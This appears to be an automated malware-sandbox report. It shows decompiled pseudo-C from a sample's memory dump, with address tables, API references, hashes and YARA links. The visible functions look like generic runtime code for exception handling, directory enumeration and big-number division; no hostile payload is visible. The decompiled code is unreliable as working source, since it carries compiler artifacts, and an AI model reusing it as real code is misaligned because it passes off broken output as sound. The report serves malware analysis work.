				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x1b
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -785
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E0027E690(_t57);
				}
				return E0027E203(_t57, _v8 ^ _t69);
			}

0x00287be1
0x00287be1
0x00287be1
0x00287be1
0x00287bec
0x00287bf1
0x00287bf3
0x00287bfb
0x00287bfd
0x00287c00
0x00287c05
0x00287c05
0x00287c11
0x00287c24
0x00287c32
0x00287c38
0x00287c3e
0x00287c44
0x00287c4a
0x00287c50
0x00287c56
0x00287c5c
0x00287c62
0x00287c68
0x00287c6f
0x00287c76
0x00287c7d
0x00287c84
0x00287c8b
0x00287c92
0x00287c93
0x00287c9c
0x00287ca2
0x00287ca2
0x00287ca5
0x00287cab
0x00287cb8
0x00287cc1
0x00287cca
0x00287cd3
0x00287ce1
0x00287ce3
0x00287ce9
0x00287cf8
0x00287d04
0x00287d07
0x00287d0c
0x00287d1b

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00287CD9
SetUnhandledExceptionFilter.KERNEL32 ref: 00287CE3
UnhandledExceptionFilter.KERNEL32(-00000311), ref: 00287CF0

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: bd92db12bb177f199eef53eab15f697b0cd9536a9e7e09aa6616e275f42ddc03
Instruction ID: 4444e46c6cdea618d240381e6d7bac2d35729e069ce774b5da66a7e977480031
Opcode Fuzzy Hash: bd92db12bb177f199eef53eab15f697b0cd9536a9e7e09aa6616e275f42ddc03
Instruction Fuzzy Hash: 9631D47591121CABCF61DF68D888B9DBBB8BF08310F5081DAE40CA7291E7309F958F54

Uniqueness

Uniqueness Score: -1.00%

Function 00289FD3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00289FD3(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				union _FINDEX_INFO_LEVELS _t58;
				signed int _t62;
				signed int _t65;
				void* _t71;
				void* _t73;
				signed int _t74;
				void* _t77;
				CHAR* _t78;
				intOrPtr* _t82;
				intOrPtr _t84;
				void* _t86;
				intOrPtr* _t87;
				signed int _t91;
				signed int _t95;
				void* _t100;
				intOrPtr _t101;
				signed int _t104;
				union _FINDEX_INFO_LEVELS _t105;
				void* _t110;
				intOrPtr _t111;
				void* _t112;
				signed int _t117;
				void* _t118;
				signed int _t119;
				void* _t120;
				void* _t121;

				_push(__ecx);
				_t82 = _a4;
				_t2 = _t82 + 1; // 0x1
				_t100 = _t2;
				do {
					_t35 =  *_t82;
					_t82 = _t82 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t104 = _a12;
				_t84 = _t82 - _t100 + 1;
				_v8 = _t84;
				if(_t84 <= (_t35 | 0xffffffff) - _t104) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t104 + 1; // 0x1
					_t77 = _t5 + _t84;
					_t110 = E00287B1B(_t84, _t77, 1);
					_pop(_t86);
					__eflags = _t104;
					if(_t104 == 0) {
						L6:
						_push(_v8);
						_t77 = _t77 - _t104;
						_t40 = E0028DD71(_t86, _t110 + _t104, _t77, _a4);
						_t119 = _t118 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t71 = E0028A212(_a16, _t100, __eflags, _t110);
							E00287A50(0);
							_t73 = _t71;
							goto L8;
						}
					} else {
						_push(_t104);
						_t74 = E0028DD71(_t86, _t110, _t77, _a8);
						_t119 = _t118 + 0x10;
						__eflags = _t74;
						if(_t74 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00287DBB();
							asm("int3");
							_t117 = _t119;
							_t120 = _t119 - 0x150;
							_t43 =  *0x29d668; // 0xd26a0a57
							_v48 = _t43 ^ _t117;
							_t87 = _v32;
							_push(_t77);
							_t78 = _v36;
							_push(_t110);
							_t111 = _v332.cAlternateFileName;
							_push(_t104);
							_v372 = _t111;
							while(1) {
								__eflags = _t87 - _t78;
								if(_t87 == _t78) {
									break;
								}
								_t45 =  *_t87;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t87 = E0028DDC0(_t78, _t87);
											continue;
										}
									}
								}
								break;
							}
							_t101 =  *_t87;
							__eflags = _t101 - 0x3a;
							if(_t101 != 0x3a) {
								L19:
								_t105 = 0;
								__eflags = _t101 - 0x2f;
								if(_t101 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t101 - 0x5c;
									if(_t101 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t101 - 0x3a;
										if(_t101 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t89 = _t87 - _t78 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
								E0027E920(_t105,  &_v332, _t105, 0x140);
								_t121 = _t120 + 0xc;
								_t112 = FindFirstFileExA(_t78, _t105,  &_v332, _t105, _t105, _t105);
								_t55 = _v336;
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t91;
									_t92 = _t91 >> 2;
									_v344 = _t91 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E00289FD3(_t78, _t92, _t105, _t112,  &(_v332.cFileName), _t78, _v340);
											_t121 = _t121 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t92 = _v287;
											__eflags = _t92;
											if(_t92 == 0) {
												goto L37;
											} else {
												__eflags = _t92 - 0x2e;
												if(_t92 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t112,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t102 =  *_t55;
									_t95 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t95 - _t65;
									if(_t95 != _t65) {
										E00285030(_t78, _t105, _t112, _t102 + _t95 * 4, _t65 - _t95, 4, E00289E2B);
									}
								} else {
									_push(_t55);
									_t57 = E00289FD3(_t78, _t89, _t105, _t112, _t78, _t105, _t105);
									L26:
									_t105 = _t57;
								}
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									FindClose(_t112);
								}
								_t58 = _t105;
							} else {
								__eflags = _t87 -  &(_t78[1]);
								if(_t87 ==  &(_t78[1])) {
									goto L19;
								} else {
									_push(_t111);
									_t58 = E00289FD3(_t78, _t87, 0, _t111, _t78, 0, 0);
								}
							}
							__eflags = _v12 ^ _t117;
							return E0027E203(_t58, _v12 ^ _t117);
						} else {
							goto L6;
						}
					}
				} else {
					_t73 = 0xc;
					L8:
					return _t73;
				}
				L40:
			}

0x00289fd8
0x00289fd9
0x00289fdc
0x00289fdc
0x00289fdf
0x00289fdf
0x00289fe1
0x00289fe2
0x00289feb
0x00289fec
0x00289fef
0x00289ff2
0x00289ff7
0x00289ffe
0x00289fff
0x0028a000
0x0028a003
0x0028a00d
0x0028a010
0x0028a011
0x0028a013
0x0028a027
0x0028a027
0x0028a02a
0x0028a034
0x0028a039
0x0028a03c
0x0028a03e
0x00000000
0x0028a040
0x0028a044
0x0028a04d
0x0028a053
0x00000000
0x0028a056
0x0028a015
0x0028a015
0x0028a01b
0x0028a020
0x0028a023
0x0028a025
0x0028a05c
0x0028a05e
0x0028a05f
0x0028a060
0x0028a061
0x0028a062
0x0028a063
0x0028a068
0x0028a06c
0x0028a06e
0x0028a074
0x0028a07b
0x0028a07e
0x0028a081
0x0028a082
0x0028a085
0x0028a086
0x0028a089
0x0028a08a
0x0028a0ab
0x0028a0ab
0x0028a0ad
0x00000000
0x00000000
0x0028a092
0x0028a094
0x0028a096
0x0028a098
0x0028a09a
0x0028a09c
0x0028a09e
0x0028a0a9
0x00000000
0x0028a0a9
0x0028a09e
0x0028a09a
0x00000000
0x0028a096
0x0028a0af
0x0028a0b1
0x0028a0b4
0x0028a0cd
0x0028a0cd
0x0028a0cf
0x0028a0d2
0x0028a0e2
0x0028a0e4
0x0028a0e4
0x0028a0d4
0x0028a0d4
0x0028a0d7
0x00000000
0x0028a0d9
0x0028a0d9
0x0028a0dc
0x00000000
0x0028a0de
0x0028a0de
0x0028a0de
0x0028a0dc
0x0028a0d7
0x0028a0ea
0x0028a0f2
0x0028a0f6
0x0028a104
0x0028a109
0x0028a11e
0x0028a120
0x0028a126
0x0028a129
0x0028a15b
0x0028a15b
0x0028a15d
0x0028a160
0x0028a166
0x0028a166
0x0028a16d
0x0028a187
0x0028a187
0x0028a196
0x0028a19b
0x0028a19e
0x0028a1a0
0x00000000
0x00000000
0x00000000
0x00000000
0x0028a16f
0x0028a16f
0x0028a175
0x0028a177
0x00000000
0x0028a179
0x0028a179
0x0028a17c
0x00000000
0x0028a17e
0x0028a17e
0x0028a185
0x00000000
0x00000000
0x00000000
0x00000000
0x0028a185
0x0028a17c
0x0028a177
0x00000000
0x0028a1a2
0x0028a1aa
0x0028a1b0
0x0028a1b2
0x0028a1b2
0x0028a1ba
0x0028a1bf
0x0028a1c7
0x0028a1ca
0x0028a1cc
0x0028a1e0
0x0028a1e5
0x0028a12b
0x0028a12b
0x0028a12f
0x0028a137
0x0028a137
0x0028a137
0x0028a139
0x0028a13c
0x0028a13f
0x0028a13f
0x0028a145
0x0028a0b6
0x0028a0b9
0x0028a0bb
0x00000000
0x0028a0bd
0x0028a0bd
0x0028a0c3
0x0028a0c8
0x0028a0bb
0x0028a14c
0x0028a157
0x00000000
0x00000000
0x00000000
0x0028a025
0x00289ff9
0x00289ffb
0x0028a057
0x0028a05b
0x0028a05b
0x00000000

Strings

., xrefs: 0028A166

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 4cfeadae1587927bba381aaa23f110fa532c777ac36b127c1d72262bedfeb730
Instruction ID: 36dc976ca7786f72efd5877cceb6902b10db2710a30efab312b8145d57bd7652
Opcode Fuzzy Hash: 4cfeadae1587927bba381aaa23f110fa532c777ac36b127c1d72262bedfeb730
Instruction Fuzzy Hash: 1E31287991020AAFDB24AE78CC84EFB7BBDDF85304F140199F519D7291EA309D558B60

Uniqueness

Uniqueness Score: -1.00%

Function 0028C0B0, Relevance: 3.5, APIs: 2, Instructions: 464
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0028C0B0(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E0027DDA0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00290DE0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E0027DDC0(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E0027DDC0(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0x28d6cd
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00290DE0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E0028AA64(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E0028AA64(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E0028AA64(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}

0x0028c0bc
0x0028c0bf
0x0028c0c3
0x0028c0cd
0x0028c0d0
0x0028c0d2
0x0028c0d4
0x0028c0e1
0x0028c0e1
0x0028c0e4
0x0028c0e4
0x0028c0e7
0x0028c0ea
0x0028c0ec
0x0028c21f
0x0028c221
0x0028c26a
0x0028c26e
0x0028c274
0x0028c223
0x0028c225
0x0028c228
0x0028c22a
0x0028c22d
0x0028c22f
0x0028c231
0x0028c265
0x0028c265
0x0028c265
0x0028c233
0x0028c238
0x0028c23e
0x0028c23e
0x0028c241
0x0028c243
0x0028c245
0x00000000
0x00000000
0x0028c247
0x0028c248
0x0028c24b
0x0028c24e
0x0028c250
0x00000000
0x0028c252
0x00000000
0x0028c252
0x00000000
0x0028c250
0x0028c254
0x0028c25b
0x0028c25f
0x0028c263
0x00000000
0x00000000
0x0028c263
0x0028c266
0x0028c266
0x0028c268
0x0028c275
0x0028c278
0x0028c27b
0x0028c27e
0x0028c27e
0x0028c282
0x0028c285
0x0028c288
0x0028c28b
0x0028c296
0x0028c28d
0x0028c292
0x0028c292
0x0028c2a0
0x0028c2a5
0x0028c2a8
0x0028c2aa
0x0028c2b4
0x0028c2b7
0x0028c2be
0x0028c2c1
0x0028c2c4
0x0028c2cc
0x0028c2d2
0x0028c2d2
0x0028c2d2
0x0028c2d2
0x0028c2c4
0x0028c2d7
0x0028c2de
0x0028c2de
0x0028c2e1
0x0028c2e4
0x0028c516
0x0028c516
0x0028c2ea
0x0028c2ea
0x0028c2f0
0x0028c2f3
0x0028c2f6
0x0028c2f9
0x0028c2fc
0x0028c2ff
0x0028c302
0x0028c302
0x0028c305
0x0028c30c
0x0028c30c
0x0028c307
0x0028c307
0x0028c307
0x0028c30e
0x0028c312
0x0028c315
0x0028c317
0x0028c31a
0x0028c321
0x0028c324
0x0028c327
0x0028c332
0x0028c335
0x0028c33a
0x0028c33f
0x0028c346
0x0028c34b
0x0028c34d
0x0028c34f
0x0028c353
0x0028c356
0x0028c359
0x0028c361
0x0028c36a
0x0028c36a
0x0028c36c
0x0028c36f
0x0028c36f
0x0028c359
0x0028c379
0x0028c37e
0x0028c383
0x0028c385
0x0028c388
0x0028c38a
0x0028c38d
0x0028c390
0x0028c392
0x0028c395
0x0028c398
0x0028c39a
0x0028c3a1
0x0028c3a6
0x0028c3a9
0x0028c3b3
0x0028c3b5
0x0028c3b7
0x0028c3ba
0x0028c3ba
0x0028c3bc
0x0028c3bf
0x0028c3c2
0x0028c3c5
0x0028c3c8
0x0028c39c
0x0028c39c
0x0028c39f
0x00000000
0x00000000
0x0028c39f
0x0028c3cb
0x0028c3cd
0x0028c3cf
0x00000000
0x0028c3d1
0x0028c3d1
0x0028c3d4
0x0028c3d6
0x0028c3d6
0x0028c3e4
0x0028c3e7
0x0028c3ec
0x0028c3ee
0x00000000
0x00000000
0x0028c3f0
0x0028c3f7
0x0028c3f7
0x0028c3fa
0x0028c3fd
0x0028c400
0x0028c403
0x0028c403
0x0028c406
0x0028c409
0x0028c40d
0x0028c410
0x0028c412
0x0028c415
0x00000000
0x00000000
0x0028c417
0x0028c415
0x0028c3f2
0x0028c3f2
0x0028c3f5
0x00000000
0x00000000
0x00000000
0x00000000
0x0028c3f5
0x0028c41c
0x0028c41c
0x00000000
0x0028c41c
0x0028c419
0x00000000
0x0028c419
0x0028c3d4
0x0028c3cf
0x0028c41f
0x0028c41f
0x0028c421
0x0028c42b
0x0028c42b
0x0028c42e
0x0028c430
0x0028c432
0x0028c434
0x0028c439
0x0028c43c
0x0028c43c
0x0028c43f
0x0028c442
0x0028c445
0x0028c447
0x0028c45c
0x0028c45e
0x0028c460
0x0028c462
0x0028c464
0x0028c466
0x0028c468
0x0028c46a
0x0028c46d
0x0028c46d
0x0028c471
0x0028c473
0x0028c479
0x0028c47c
0x0028c47c
0x0028c47c
0x0028c480
0x0028c480
0x0028c485
0x0028c488
0x0028c488
0x0028c48d
0x0028c48f
0x0028c491
0x0028c498
0x0028c498
0x0028c49a
0x0028c49f
0x0028c4a1
0x0028c4a4
0x0028c4a4
0x0028c4a7
0x0028c4b0
0x0028c4b0
0x0028c4b2
0x0028c4b2
0x0028c4b7
0x0028c4bd
0x0028c4c1
0x0028c4c4
0x0028c4c7
0x0028c4c9
0x0028c4c9
0x0028c4c9
0x0028c4ce
0x0028c4ce
0x0028c4d1
0x0028c4d4
0x0028c493
0x0028c493
0x0028c496
0x00000000
0x00000000
0x0028c496
0x0028c491
0x0028c4db
0x0028c4db
0x0028c4dc
0x0028c423
0x0028c423
0x0028c425
0x00000000
0x00000000
0x0028c425
0x0028c4ec
0x0028c4f1
